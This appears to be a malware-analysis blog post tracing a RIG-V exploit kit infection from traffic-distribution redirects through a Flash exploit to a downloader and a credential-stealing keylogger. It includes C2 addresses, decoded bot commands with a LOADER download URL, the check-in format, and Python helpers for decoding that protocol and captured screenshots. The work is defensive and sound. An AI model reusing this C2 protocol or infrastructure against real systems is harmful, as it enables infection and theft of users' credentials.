302 Redirects from Traffic Distribution System Led to RIG-V EK at 194.87.238.156. Dropped Downloader & “XKeyScore” Keylogger

IOCs:

  • GET /in/traf/ – 302 redirect via port 18001 (BossTDS port)
  • GET /boom/mix.php – 302 redirect via port 18001 (BossTDS port)
  • 194.87.238.156 – try.uludan.com – Rig-V EK (landing page, Flash exploit, and payload)
  • 111.221.47.162 – POST /faa38820fa/dd6c45917a/d23d3e97c0/chat.php – Base64 encoded data being POSTed back
  • 188.40.248.71 – GET /~mysuperp/crypt2_7038.exe – Additional malware downloaded
  • 91.107.108.124 – POST /log/index.php – Keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection)
  • Post infection DNS queries:
    • envioenvio.fromru.su (ET DNS Query for .su TLD (Soviet Union) Often Malware Related)
    • polikko.eu (ET TROJAN Possible Kelihos .eu CnC Domain Generation Algorithm (DGA) Lookup NXDOMAIN Response)

Traffic:

traffic-edited

additional-malware-downloaded-and-new-post-request

ET Alerts:

et-alerts-2

Hashes:

Picture of Site:

malicious-site-1

Infection Chain:

This site doesn’t appear to be one that anyone would visit directly. To me it looks like a domain that users are redirected to.

For example, I originally discovered this site in a customer’s network traffic after they visited sites used to watch live streaming sporting events.

Unfortunately, this customer doesn’t give me packets (sad face), so I can’t confirm the referer for this incident (although sports streaming sites are full of unwanted redirections). I also tried to recreate the traffic but was unsuccessful.

Finally, I thought, why not try going directly to the domain? I was immediately redirected to a TDS server via an iframe:

malicious-site-edited

The destination port used for the redirection is TCP port 18001, the port BossTDS listens on. A TDS (Traffic Distribution System) is a gate that routes incoming visitors to different destinations based on criteria such as geolocation, browser and referer, and cyber criminals have used them before as a means to funnel victims to malware.

Here is the TCP stream showing the request to the TDS server and the 302 Found it returned:

tds-1-edited

The host was then redirected to /boom/mix[.]php, and the server returned another 302 Found:

tds-second-302-found-edited

The second 302 Found points directly to a Rig-V exploit kit landing page.

Here is a little bit of the obfuscated code that was found on the landing page:

landing-page-edited

Here is the landing page partially deobfuscated (Thanks to my coworker “elf” for doing the deobfuscation):

deobfuscated-landing-page

You can see the URL for the Flash exploit on the landing page and the URL for the payload.

After the host was redirected to the landing page we can see the Flash exploit being requested and sent back to the host:

flash-exploit

This Flash exploit targets CVE-2015-8651 (Flash Player up to 20.0.0.228/235). Following the Flash exploit we see two identical requests for the payload, which was dropped in %TEMP%:

payload-1

payload-2

temp

The file is also created as AppData\Roaming\YFFjZF9i\sirhcqngr.exe, which shows up as a running process with the description “Graph Microsoft”:

We can also see that it created the following registry key under HKEY_CURRENT_USER\Software\YFFjZF9i:

regedit

The value of “a” is “aHR0cDovLzExMS4yMjEuNDcuMTYyL2ZhYTM4ODIwZmEvZGQ2YzQ1OTE3YS9kMjNkM2U5N2MwL2NoYXQucGhw”, which base64-decodes to the following:

  • hxxp://111.221.47.162/faa38820fa/dd6c45917a/d23d3e97c0/chat.php

This is the URL the malware uses to POST base64-encoded data back to the server. Here is the first POST request to 111.221.47.162:

first-post-request-to-111-221-47-162

Notice that the first POST carries a single parameter, “_wv”, set to the base64 string “ZW50ZXI” (sent with its “=” padding stripped), which decodes to the command “enter”.

The server responds with a 404 error page that carries its own base64 string, “c3VjY2Vzcw”, which decodes to “success”.

Once the infected machine receives that reply, the malware sends a second POST with the same auth cookie (auth=bc00595440e801f8a5d2a2ad13b9791b) and a body of encoded system information:

second-post-containing-system-information

The infected machine POSTs back base64-encoded data in the following “&”-separated format:

  • cmd&<GUID of machine>&<logged-in username: system name: domain name>&<Windows version and platform>&<AV product info>&<date and time of execution>

The server’s response is the base64 chunk “MTQ2OTEwMDA5Njg4MjAwMCNib3RraWxsZXIjMTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj”, which decodes to the following:

  • 1469100096882000#botkiller#1401076386715766#rate 5#

We can also see that there is a .vbs file in the user’s Startup folder containing the following command:

vbs-in-startup-folder

wscript-shell-run

After letting the system sit for a while, I found that it made a similar POST request as before; this time, however, the server responded with encoded data containing a download URL for additional malware:

second-post-containing-url-for-additional-malware

The base64 contained in the response decodes to the text below. Note the structure: the reply is a “#”-delimited list of tasks, each a numeric ID followed by a command (“botkiller”, “rate 5”, “LOADER <url>”), and the two tasks from the earlier reply are repeated verbatim ahead of the new one:

  • 1469100096882000#botkiller#1401076386715766#rate 5#1480369403542508#LOADER hxxp://188.40.248.71/~mysuperp/crypt2_7038.exe
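The C2 exchange above is small enough to handle in a few functions. The following helper is an added example written for this post, not code from the original write-up or from the malware: it decodes the padding-stripped base64 seen in the registry value and in the `_wv=ZW50ZXI` / `c3VjY2Vzcw` handshake, parses the `&`-separated check-in, and splits a server reply into `(id, command, argument)` tasks so that any `LOADER` URL can be pulled out as an IOC. The field layout, the placeholder GUID/host/AV strings in the constructed check-in, and the re-encoding of the second reply from the decoded text shown above are assumptions; the first reply and the registry value are the exact strings the post reports.

```python
from __future__ import annotations

import base64
from dataclasses import dataclass

# Sample data. The two strings marked "from the post" are the exact base64
# the capture showed; the others are constructed or re-encoded here to
# exercise the parser. The field layout is an assumption drawn from the one
# check-in and two replies the post documents.
REGISTRY_VALUE_A = (
    "aHR0cDovLzExMS4yMjEuNDcuMTYyL2ZhYTM4ODIwZmEvZGQ2YzQ1OTE3YS9kMjNkM2U5N2MwL2NoYXQucGhw"
)  # from the post
FIRST_REPLY_B64 = "MTQ2OTEwMDA5Njg4MjAwMCNib3RraWxsZXIjMTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj"  # from the post
REPLY_WITH_LOADER_B64 = base64.b64encode(
    b"1469100096882000#botkiller#1401076386715766#rate 5#"
    b"1480369403542508#LOADER hxxp://188.40.248.71/~mysuperp/crypt2_7038.exe"
).decode()  # re-encoded from the decoded text the post shows
SAMPLE_CHECKIN_B64 = base64.b64encode(
    b"cmd&{00000000-0000-0000-0000-000000000000}&Home: DESKTOP-TEST: WORKGROUP"
    b"&Windows 7 x86&Windows Defender&2016-12-01 10:00:00"
).decode()  # constructed; GUID, host, AV and time are placeholders


def b64decode_lax(s: str) -> bytes:
    """Decode base64 whose '=' padding was stripped, as _wv=ZW50ZXI and the
    c3VjY2Vzcw reply were; base64.b64decode() alone would raise on them."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


@dataclass
class CheckIn:
    command: str
    machine_guid: str
    user: str
    host: str
    domain: str
    os_info: str
    av_info: str
    timestamp: str


def parse_checkin(b64_body: str) -> CheckIn:
    """Parse the '&'-separated check-in documented in the post:
    cmd&<GUID>&<user: host: domain>&<OS>&<AV>&<date/time>."""
    fields = b64decode_lax(b64_body).decode("utf-8", "replace").split("&")
    if len(fields) != 6:
        raise ValueError(f"expected 6 fields, got {len(fields)}")
    cmd, guid, identity, os_info, av_info, ts = fields
    # The post shows the identity triple separated by ':'; ': ' is assumed.
    parts = [p.strip() for p in identity.split(":", 2)]
    parts += [""] * (3 - len(parts))  # tolerate a missing domain
    user, host, domain = parts
    return CheckIn(cmd, guid, user, host, domain, os_info, av_info, ts)


@dataclass
class Task:
    task_id: str
    command: str
    argument: str


def parse_tasks(b64_body: str) -> list[Task]:
    """Split a server reply into tasks. Both captured replies have the shape
    '<id>#<verb> [arg]#' repeated, so decode, split on '#' and pair up."""
    text = b64decode_lax(b64_body).decode("utf-8", "replace")
    parts = [p for p in text.split("#") if p]
    if len(parts) % 2:
        raise ValueError("dangling task id without a command")
    tasks = []
    for task_id, cmd in zip(parts[0::2], parts[1::2]):
        if not task_id.isdigit():
            raise ValueError(f"non-numeric task id {task_id!r}")
        verb, _, arg = cmd.partition(" ")
        tasks.append(Task(task_id, verb, arg))
    return tasks


def loader_urls(tasks: list[Task]) -> list[str]:
    """Download URLs from LOADER tasks: the IOCs worth blocking before the
    second-stage GET happens."""
    return [t.argument for t in tasks if t.command == "LOADER"]


if __name__ == "__main__":
    print(b64decode_lax(REGISTRY_VALUE_A).decode())
    print(parse_checkin(SAMPLE_CHECKIN_B64))
    for t in parse_tasks(REPLY_WITH_LOADER_B64):
        print(t)
    print(loader_urls(parse_tasks(REPLY_WITH_LOADER_B64)))
```

Because the task list is ID-prefixed and the server repeats earlier tasks, a replay harness that speaks this protocol needs to de-duplicate by task ID rather than act on every entry; the same parser works as a Suricata/Zeek post-processing step over captured POST bodies to surface LOADER URLs automatically.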

We then see the host make a GET request for the additional malware (crypt2_7038.exe):

trojan-downloaded-additional-malware

An additional file (NN6B09.tmp) is created in %TEMP%, and the file “winsvc.exe” is dropped in the Startup folder:

Following the execution of winsvc.exe we see a POST request to 91.107.108.124 (POST /log/index.php) containing encoded data (partial image of the POST request):

post-screenshot

Taking a closer look at the POSTed data, however, it is actually a URL-encoded screenshot of my desktop, tagged with my username (Home) and MAC address (blacked out). URL-decoding the data (here with http://www.url-encode-decode.com/, though victim data is better decoded locally than pasted into a third-party site) reveals the image being sent over the wire:

posted-screenshot

ET alerted on this traffic as a keylogger POSTing keystrokes (Win.Trojan.Amasages variant outbound connection). That is accurate: going to Chase.com and entering fake credentials shows them POSTed back to the server (typos included), along with the browser I was using, the time of the traffic, the folders and programs I had open, and the websites that were open:

chase-posting

keylogger
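Spotting that a form-encoded POST body is really a screenshot does not need a web decoder. The snippet below is an added example written for this post, not code from the original write-up or from the keylogger: it splits an `application/x-www-form-urlencoded` body into fields, percent-decodes each one separately, and sniffs the result for JPEG/PNG/BMP/GIF magic bytes. The field names (`user`, `mac`, `screen`) and the fake JPEG are constructed; the post only shows that a username, MAC address and a screenshot travelled URL-encoded in the POST to /log/index.php.

```python
from __future__ import annotations

from urllib.parse import quote_from_bytes, unquote_to_bytes

# Constructed sample: a fake JPEG (genuine SOI/APP0 header, junk body) wrapped
# in a form-encoded body with the kinds of tags the post mentions. Field names
# are assumptions; XKeyScore's real parameter names are not shown in the post.
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + bytes(range(256)) + b"\xff\xd9"
SAMPLE_BODY = (
    b"user=Home&mac=" + quote_from_bytes(b"00:11:22:33:44:55", safe="").encode()
    + b"&screen=" + quote_from_bytes(FAKE_JPEG, safe="").encode()
)

# Magic bytes for the formats a screenshot grabber is likely to send.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"BM": "bmp",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff_image(data: bytes) -> str | None:
    """Return the image type if `data` starts with a known magic, else None."""
    for magic, name in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def inspect_post_body(body: bytes) -> dict:
    """Split on '&' before percent-decoding, so a %26 inside the image can
    never be mistaken for a field separator, then report which fields carry
    an image. Text fields are returned decoded; image fields are summarised
    and their raw bytes kept under 'images' for carving to disk."""
    report: dict = {"fields": {}, "images": []}
    for pair in body.split(b"&"):
        if not pair:
            continue
        key, _, value = pair.partition(b"=")
        name = unquote_to_bytes(key).decode("utf-8", "replace")
        # In form encoding '+' means space; a literal '+' byte arrives as %2B.
        data = unquote_to_bytes(value.replace(b"+", b" "))
        kind = sniff_image(data)
        if kind:
            report["images"].append({"field": name, "kind": kind, "data": data})
            report["fields"][name] = f"<{kind} image, {len(data)} bytes>"
        else:
            report["fields"][name] = data.decode("utf-8", "replace")
    return report


if __name__ == "__main__":
    r = inspect_post_body(SAMPLE_BODY)
    print(r["fields"])
    for img in r["images"]:
        print(f"field {img['field']!r} carries a {img['kind']} of {len(img['data'])} bytes")
```

Run over the bodies of the POSTs to /log/index.php, this turns “a wall of percent-encoded text” into a per-field summary and yields the decoded image bytes for the case file; the same magic-byte check is what a DLP or IDS rule would key on, since URL-encoding inflates a screenshot roughly threefold but leaves its header recognisable after decoding.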

As always, I recommend blocking the IPs and domains listed in the IOCs section.

Reference:

  • Shout-out to Twitter user @luutala for the following reference, which helped augment my investigation:
  • https://securingtomorrow.mcafee.com/mcafee-labs/teslacrypt-arrives-via-neutrino-exploit-kit/

UPDATE

On December 13th, 2016, @sysopfb informed me that, judging by the name from the panel source, the keylogger is calling itself XKeyScore.

Panel login for “XKeyScore”:

xkeyscore-control-panel-login

XKEYSCORE (abbreviated as XKS) is also the name of a formerly secret computer system first used by the United States National Security Agency for searching and analyzing global Internet data.

malwarebreakdown

Just a normal person who spends their free time infecting systems with malware.
